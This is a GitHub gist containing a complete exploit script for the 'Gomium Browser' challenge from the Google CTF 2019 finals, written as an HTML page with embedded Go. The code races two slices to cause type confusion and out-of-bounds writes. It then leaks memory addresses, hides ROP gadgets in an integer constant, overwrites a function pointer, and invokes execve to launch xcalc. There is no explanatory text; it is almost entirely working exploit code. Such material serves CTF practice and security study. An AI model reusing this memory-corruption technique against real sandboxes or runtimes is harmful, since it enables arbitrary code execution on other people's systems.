Last active
August 17, 2020 19:47
-
-
Save hama7230/fa53db62313c0b326fea49a0d0180ac4 to your computer and use it in GitHub Desktop.
Google Capture The Flag 2019 (Finals) Gomium Browser
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script type="text/goscript"> | |
| package main | |
| import "fmt" | |
| func bring_your_own_gadgts(x uint64, y uint64, z uint64, w uint64, v uint64) uint64 { | |
| var a uint64 = 0xc3050f585a5e5f58; | |
| var b uint64 = 0xdeadbeefdeadbeef+1 | |
| var c uint64 = 0xdeadbeefdeadbeef+2 | |
| var d uint64 = 0xdeadbeefdeadbeef+3 | |
| var e uint64 = 0xdeadbeefdeadbeef+4 | |
| tmp := []uint64{a, b, c, d, e} | |
| fmt.Println("hoge") | |
| // return a + b | |
| return tmp[0] + tmp[1] | |
| } | |
| type fptr struct { | |
| f func(x uint64, y uint64, z uint64, w uint64, v uint64) uint64 | |
| } | |
| func addrof(i interface{}) uint64 { | |
| s := fmt.Sprintf("%p", i) | |
| var result uint64 = 0 | |
| for i := 0; i < len(s) - 2; i++ { | |
| var tmp uint64 = 0 | |
| var c = uint8(s[len(s) - i - 1: len(s) - i][0]) | |
| if '0' <= c && c <= '9' { | |
| tmp = uint64(c) - uint64('0') | |
| } else { | |
| tmp = uint64(c) - 'a' + 10 | |
| } | |
| result += (uint64(tmp) << (i*4)) | |
| } | |
| return result | |
| } | |
| var win bool = false | |
| func main() { | |
| long := make([]*uint64, 8) | |
| short := make([]*uint64, 4) | |
| target := make([]*uint64, 4) | |
| oob := make([]uint64, 4) | |
| func_ptr := new(fptr) | |
| str := "hogehogehogehoge" | |
| oob[0]= 0xdeadbeef | |
| fmt.Printf("%x\n", addrof(&long)) | |
| fmt.Printf("%x\n", addrof(&short)) | |
| fmt.Printf("%x\n", addrof(&target)) | |
| fmt.Printf("%x\n", addrof(&oob)) | |
| fmt.Printf("%x\n", addrof(&func_ptr)) | |
| fmt.Printf("%x\n", addrof(&str)) | |
| var hoge uint64 = 0xdeadbeefdeadbeef | |
| confused := short | |
| go func() { | |
| for win == false { | |
| confused = long | |
| confused = short | |
| } | |
| }() | |
| g := func() { | |
| confused[5] = &hoge | |
| confused[6] = &hoge | |
| if len(target) > 0x10 { | |
| win = true | |
| return | |
| } | |
| } | |
| f := func() { | |
| defer func() { | |
| if r := recover(); r != nil { | |
| } | |
| }() | |
| g() | |
| } | |
| for win == false { | |
| f() | |
| } | |
| fmt.Println("race win") | |
| fmt.Println("len(target)=", len(target)) | |
| target[4] = nil | |
| target[5] = &hoge | |
| target[6] = &hoge | |
| target[6] = &hoge | |
| func_ptr.f = bring_your_own_gadgts | |
| oob[addrof(&oob)/8 + 1] = addrof(&func_ptr)+ 0x100 | |
| oob[addrof(&oob)/8 + 2] = addrof(&func_ptr)+ 0x100 | |
| // overwrite function pointer | |
| oob[addrof(&func_ptr)/8 + 1] = addrof(&func_ptr) + 0x18 | |
| oob[addrof(&func_ptr)/8 + 3] = addrof(bring_your_own_gadgts) + 0x39 | |
| // write "//usr/bin/xcalc" and its pointer | |
| oob[addrof(&oob)/8 + 4] = 0x69622f7273752f2f | |
| oob[addrof(&oob)/8 + 5] = 0x00636c6163782f6e | |
| oob[addrof(&oob)/8 + 8] = addrof(&oob) + 0x20 | |
| // write "DISPLAY=:0" and its pointer | |
| oob[addrof(&oob)/8 + 10] = 0x3d59414c50534944 | |
| oob[addrof(&oob)/8 + 11] = 0x303a | |
| oob[addrof(&oob)/8 + 12] = addrof(&oob) + 0x50 | |
| // trigger execve() | |
| func_ptr.f(addrof(&oob) + 0x20, addrof(&oob) + 0x40, addrof(&oob)+0x60, 59, 0xdeadbeef) | |
| } | |
| </script> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment